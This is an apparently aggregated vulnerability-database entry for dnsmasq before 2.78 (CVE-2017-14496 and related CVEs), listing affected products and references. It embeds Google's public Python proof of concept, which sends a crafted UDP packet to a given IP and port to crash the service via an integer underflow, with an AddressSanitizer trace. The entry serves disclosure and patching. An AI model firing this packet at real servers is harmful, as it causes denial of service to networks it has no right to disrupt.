Details of VAR-E-201710-0035

ID

VAR-E-201710-0035

CVE

cve_id:	CVE-2017-14496	Trust: 1.8
cve_id:	CVE-2017-14494	Trust: 0.8
cve_id:	CVE-2017-14495	Trust: 0.8
cve_id:	CVE-2017-14493	Trust: 0.8
cve_id:	CVE-2017-14492	Trust: 0.8
cve_id:	CVE-2017-14491	Trust: 0.8
cve_id:	CVE-2017-13704	Trust: 0.3

EDB ID

42946

TITLE

Dnsmasq < 2.78 - Integer Underflow - Multiple dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 42946

DESCRIPTION

Dnsmasq < 2.78 - Integer Underflow. CVE-2017-14496 . dos exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 42946

AFFECTED PRODUCTS

vendor:	dnsmasq	model:	-	scope:	lt	version:	2.78	Trust: 4.6
vendor:	redhat	model:	enterprise linux server year extended update support	scope:	eq	version:	-47.4	Trust: 0.6
vendor:	dnsmasq	model:	lack of free	scope:	-	version:	-	Trust: 0.5
vendor:	dnsmasq	model:	stack-based	scope:	-	version:	-	Trust: 0.5
vendor:	dnsmasq	model:	integer underflow	scope:	-	version:	-	Trust: 0.5
vendor:	dnsmasq	model:	information leak	scope:	-	version:	-	Trust: 0.5
vendor:	dnsmasq	model:	2-byte heap-based	scope:	-	version:	-	Trust: 0.5
vendor:	dnsmasq	model:	heap-based	scope:	-	version:	-	Trust: 0.5
vendor:	ubuntu	model:	linux	scope:	eq	version:	17.04	Trust: 0.3
vendor:	ubuntu	model:	linux lts	scope:	eq	version:	16.04	Trust: 0.3
vendor:	ubuntu	model:	linux lts	scope:	eq	version:	14.04	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.2.2	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.77	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.75	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.72	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.71	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.70	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.7	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.65	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.64	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.63	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.62	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.61	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.60	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.6	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.59	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.58	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.57	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.56	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.55	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.54	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.53	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.52	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.51	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.50	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.49	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.48	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.47	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.46	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.45	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.44	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.43	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.42	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.41	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.40	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.4	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.38	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.37	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.36	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.35	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.34	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.33	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.30	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.29	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.28	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.27	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.26	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.25	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.24	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.23	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.22	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.21	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.20	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.2	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.19	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.18	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.17	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.16	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.15	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.14	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.13	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.12	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.11	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	2.10	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.9	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.8	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.6	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.5	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.4	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.3	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.18	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.17	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.16	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.15	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.14	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.13	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.12	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.11	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.10	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	1.0	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	0.996	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	0.992	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	0.98	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	0.96	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	0.95	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	0.7	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	0.6	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	0.5	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	eq	version:	0.4	Trust: 0.3
vendor:	slackware	model:	linux	scope:	eq	version:	14.2	Trust: 0.3
vendor:	slackware	model:	linux	scope:	eq	version:	14.1	Trust: 0.3
vendor:	slackware	model:	linux	scope:	eq	version:	14.0	Trust: 0.3
vendor:	slackware	model:	linux	scope:	eq	version:	13.37	Trust: 0.3
vendor:	slackware	model:	linux	scope:	eq	version:	13.1	Trust: 0.3
vendor:	slackware	model:	linux	scope:	eq	version:	13.0	Trust: 0.3
vendor:	redhat	model:	enterprise linux workstation optional	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux workstation optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux workstation	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux workstation	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux server tus	scope:	eq	version:	6.6	Trust: 0.3
vendor:	redhat	model:	enterprise linux server tus	scope:	eq	version:	6.5	Trust: 0.3
vendor:	redhat	model:	enterprise linux server optional eus	scope:	eq	version:	7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux server optional eus	scope:	eq	version:	7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux server optional eus	scope:	eq	version:	6.5	Trust: 0.3
vendor:	redhat	model:	enterprise linux server optional aus	scope:	eq	version:	6.6	Trust: 0.3
vendor:	redhat	model:	enterprise linux server optional aus	scope:	eq	version:	6.5	Trust: 0.3
vendor:	redhat	model:	enterprise linux server optional aus	scope:	eq	version:	6.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux server optional	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux server optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux server for arm	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux server eus	scope:	eq	version:	7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux server eus	scope:	eq	version:	7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux server aus	scope:	eq	version:	6.6	Trust: 0.3
vendor:	redhat	model:	enterprise linux server aus	scope:	eq	version:	6.5	Trust: 0.3
vendor:	redhat	model:	enterprise linux server aus	scope:	eq	version:	6.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux server aus	scope:	eq	version:	6.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux server tus	scope:	eq	version:	-7.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux server tus	scope:	eq	version:	-7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux server tus	scope:	eq	version:	-7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux server extended update support	scope:	eq	version:	-7.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux server extended update support	scope:	eq	version:	-7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux server extended update suppor	scope:	eq	version:	-7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux server aus	scope:	eq	version:	-7.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux server aus	scope:	eq	version:	-7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux server aus	scope:	eq	version:	-7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux server year extended update support	scope:	eq	version:	-47.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux server year extended upd	scope:	eq	version:	-47.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	5	Trust: 0.3
vendor:	redhat	model:	enterprise linux long life server	scope:	eq	version:	5.9	Trust: 0.3
vendor:	redhat	model:	enterprise linux hpc node optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux hpc node	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux for scientific computing	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power little endian extended update supp	scope:	eq	version:	-7.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power little endian	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power big endian extended update support	scope:	eq	version:	-7.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power big endian	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power little endian extended update suppo	scope:	eq	version:	-7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power little endian extended update suppo	scope:	eq	version:	-7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power big endian extended update support	scope:	eq	version:	-7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power big endian extended update support	scope:	eq	version:	-7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux for ibm z systems extended update support	scope:	eq	version:	-7.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux for ibm z systems extended update support	scope:	eq	version:	-7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux for ibm z systems extended update support	scope:	eq	version:	-7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux for ibm z systems	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux eus compute node	scope:	eq	version:	7.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux eus compute node	scope:	eq	version:	7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux eus compute node	scope:	eq	version:	7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux computenode optional eus	scope:	eq	version:	7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux computenode optional eus	scope:	eq	version:	7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux computenode optional	scope:	eq	version:	7	Trust: 0.3
vendor:	redhat	model:	enterprise linux computenode eus	scope:	eq	version:	7.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux computenode eus	scope:	eq	version:	7.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux computenode	scope:	eq	version:	7	Trust: 0.3
vendor:	oracle	model:	linux	scope:	eq	version:	7	Trust: 0.3
vendor:	oracle	model:	linux	scope:	eq	version:	6	Trust: 0.3
vendor:	opensuse	model:	leap	scope:	eq	version:	42.3	Trust: 0.3
vendor:	opensuse	model:	leap	scope:	eq	version:	42.2	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	eq	version:	1.7.6	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	eq	version:	1.7	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	eq	version:	1.6.10	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	eq	version:	1.6	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	eq	version:	1.5.7	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	eq	version:	1.5	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	eq	version:	1.2	Trust: 0.3
vendor:	google	model:	android	scope:	eq	version:	7.1.1	Trust: 0.3
vendor:	google	model:	android	scope:	eq	version:	6.0.1	Trust: 0.3
vendor:	google	model:	android	scope:	eq	version:	5.1.1	Trust: 0.3
vendor:	google	model:	android	scope:	eq	version:	5.0.2	Trust: 0.3
vendor:	google	model:	android	scope:	eq	version:	4.4.4	Trust: 0.3
vendor:	google	model:	android	scope:	eq	version:	8.0	Trust: 0.3
vendor:	google	model:	android	scope:	eq	version:	7.1.2	Trust: 0.3
vendor:	google	model:	android	scope:	eq	version:	7.0	Trust: 0.3
vendor:	google	model:	android	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fedoraproject	model:	fedora	scope:	eq	version:	27	Trust: 0.3
vendor:	debian	model:	linux sparc	scope:	eq	version:	6.0	Trust: 0.3
vendor:	debian	model:	linux s/390	scope:	eq	version:	6.0	Trust: 0.3
vendor:	debian	model:	linux powerpc	scope:	eq	version:	6.0	Trust: 0.3
vendor:	debian	model:	linux mips	scope:	eq	version:	6.0	Trust: 0.3
vendor:	debian	model:	linux ia-64	scope:	eq	version:	6.0	Trust: 0.3
vendor:	debian	model:	linux ia-32	scope:	eq	version:	6.0	Trust: 0.3
vendor:	debian	model:	linux ia-30	scope:	eq	version:	6.0	Trust: 0.3
vendor:	debian	model:	linux arm	scope:	eq	version:	6.0	Trust: 0.3
vendor:	debian	model:	linux amd64	scope:	eq	version:	6.0	Trust: 0.3
vendor:	centos	model:	centos	scope:	eq	version:	7	Trust: 0.3
vendor:	centos	model:	centos	scope:	eq	version:	6	Trust: 0.3
vendor:	thekelleys	model:	dnsmasq	scope:	ne	version:	2.78	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	ne	version:	1.8	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	ne	version:	1.7.7	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	ne	version:	1.6.11	Trust: 0.3
vendor:	kubernetes	model:	kubernetes	scope:	ne	version:	1.5.8	Trust: 0.3

sources: BID: 101085 // PACKETSTORM: 144468 // PACKETSTORM: 144473 // PACKETSTORM: 144462 // PACKETSTORM: 144471 // PACKETSTORM: 144480 // PACKETSTORM: 144479 // EXPLOIT-DB: 42946 // EDBNET: 94400 // EDBNET: 94654 // EDBNET: 94657 // EDBNET: 94656 // EDBNET: 94655 // EDBNET: 94653

EXPLOIT

'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.

=================================================================
==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
#0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
#1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
#2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
#3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
#4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
#5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)

0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)

SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
==2215==ABORTING
'''

#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/

import socket
import sys

def negative_size_param():
data = '''00 00 00 00 00 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08
08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01
13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00
08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00
00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
return data

if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])

packet = negative_size_param()

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
s.sendto(packet, (ip, port))
s.close()

Trust: 1.0

sources: EXPLOIT-DB: 42946

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 42946

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 42946

TYPE

Integer Underflow

Trust: 1.6

sources: EXPLOIT-DB: 42946 // EDBNET: 94400

CREDITS

Google Security Research

Trust: 0.6

sources: EXPLOIT-DB: 42946

EXTERNAL IDS

db:	NVD	id:	CVE-2017-14496	Trust: 3.0
db:	EXPLOIT-DB	id:	42946	Trust: 1.6
db:	NVD	id:	CVE-2017-14494	Trust: 1.4
db:	NVD	id:	CVE-2017-14495	Trust: 1.4
db:	NVD	id:	CVE-2017-14493	Trust: 1.4
db:	NVD	id:	CVE-2017-14492	Trust: 1.4
db:	NVD	id:	CVE-2017-14491	Trust: 0.8
db:	EDBNET	id:	94400	Trust: 0.6
db:	0DAYTODAY	id:	28724	Trust: 0.6
db:	EDBNET	id:	94654	Trust: 0.6
db:	0DAYTODAY	id:	28727	Trust: 0.6
db:	EDBNET	id:	94657	Trust: 0.6
db:	0DAYTODAY	id:	28726	Trust: 0.6
db:	EDBNET	id:	94656	Trust: 0.6
db:	0DAYTODAY	id:	28725	Trust: 0.6
db:	EDBNET	id:	94655	Trust: 0.6
db:	0DAYTODAY	id:	28723	Trust: 0.6
db:	EDBNET	id:	94653	Trust: 0.6
db:	PACKETSTORM	id:	144468	Trust: 0.5
db:	PACKETSTORM	id:	144473	Trust: 0.5
db:	PACKETSTORM	id:	144462	Trust: 0.5
db:	PACKETSTORM	id:	144471	Trust: 0.5
db:	PACKETSTORM	id:	144480	Trust: 0.5
db:	PACKETSTORM	id:	144479	Trust: 0.5
db:	NVD	id:	CVE-2017-13704	Trust: 0.3
db:	CERT/CC	id:	VU#973527	Trust: 0.3
db:	ICS CERT	id:	ICSA-17-332-01	Trust: 0.3
db:	BID	id:	101085	Trust: 0.3

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2017-14496	Trust: 1.5
url:	https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/cve-2017-14496.py	Trust: 1.0
url:	https://www.exploit-db.com/exploits/42946/	Trust: 0.6
url:	https://0day.today/exploits/28724	Trust: 0.6
url:	https://0day.today/exploits/28727	Trust: 0.6
url:	https://0day.today/exploits/28726	Trust: 0.6
url:	https://0day.today/exploits/28725	Trust: 0.6
url:	https://0day.today/exploits/28723	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2017-14495	Trust: 0.5
url:	https://nvd.nist.gov/vuln/detail/cve-2017-14493	Trust: 0.5
url:	https://nvd.nist.gov/vuln/detail/cve-2017-14494	Trust: 0.5
url:	https://nvd.nist.gov/vuln/detail/cve-2017-14491	Trust: 0.5
url:	https://nvd.nist.gov/vuln/detail/cve-2017-14492	Trust: 0.5
url:	https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14492.py	Trust: 0.3
url:	https://access.redhat.com/security/cve/cve-2017-14495	Trust: 0.3
url:	https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14494.py	Trust: 0.3
url:	https://access.redhat.com/errata/rhsa-2017:2836	Trust: 0.3
url:	https://access.redhat.com/security/cve/cve-2017-14491	Trust: 0.3
url:	https://source.android.com/security/bulletin/2017-10-01	Trust: 0.3
url:	https://ics-cert.us-cert.gov/advisories/icsa-17-332-01	Trust: 0.3
url:	https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html	Trust: 0.3
url:	https://bugzilla.redhat.com/show_bug.cgi?id=1495411	Trust: 0.3
url:	https://bugzilla.redhat.com/show_bug.cgi?id=1495510	Trust: 0.3
url:	https://access.redhat.com/security/cve/cve-2017-14494	Trust: 0.3
url:	https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14496.py	Trust: 0.3
url:	https://bugzilla.redhat.com/show_bug.cgi?id=1495409 bug 1495409	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/973527	Trust: 0.3
url:	https://bugzilla.redhat.com/show_bug.cgi?id=1495410	Trust: 0.3
url:	https://www.debian.org/security/2017/dsa-3989	Trust: 0.3
url:	https://access.redhat.com/security/cve/cve-2017-13704	Trust: 0.3
url:	https://access.redhat.com/security/cve/cve-2017-14492	Trust: 0.3
url:	https://bugzilla.redhat.com/show_bug.cgi?id=1495416	Trust: 0.3
url:	https://access.redhat.com/security/cve/cve-2017-14496	Trust: 0.3
url:	https://bugzilla.redhat.com/show_bug.cgi?id=1495415	Trust: 0.3
url:	http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.601472	Trust: 0.3
url:	https://access.redhat.com/security/cve/cve-2017-14493	Trust: 0.3
url:	https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14493.py	Trust: 0.3
url:	https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14491.py	Trust: 0.3
url:	http://www.thekelleys.org.uk/dnsmasq/doc.html	Trust: 0.3
url:	https://bugzilla.redhat.com/show_bug.cgi?id=1495412	Trust: 0.3
url:	https://access.redhat.com/errata/rhsa-2017:2837	Trust: 0.3
url:	http://www.thekelleys.org.uk/dnsmasq/changelog	Trust: 0.3
url:	https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14495.py	Trust: 0.3
url:	https://github.com/kubernetes/kubernetes/blob/master/changelog.md	Trust: 0.3

SOURCES

db:	BID	id:	101085
db:	PACKETSTORM	id:	144468
db:	PACKETSTORM	id:	144473
db:	PACKETSTORM	id:	144462
db:	PACKETSTORM	id:	144471
db:	PACKETSTORM	id:	144480
db:	PACKETSTORM	id:	144479
db:	EXPLOIT-DB	id:	42946
db:	EDBNET	id:	94400
db:	EDBNET	id:	94654
db:	EDBNET	id:	94657
db:	EDBNET	id:	94656
db:	EDBNET	id:	94655
db:	EDBNET	id:	94653

LAST UPDATE DATE

2024-03-21T15:11:50.082000+00:00

SOURCES UPDATE DATE

db:

BID

id:

101085

date:

2017-10-02T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	101085	date:	2017-10-02T00:00:00
db:	PACKETSTORM	id:	144468	date:	2017-10-02T05:22:22
db:	PACKETSTORM	id:	144473	date:	2017-10-02T10:01:11
db:	PACKETSTORM	id:	144462	date:	2017-10-02T03:33:33
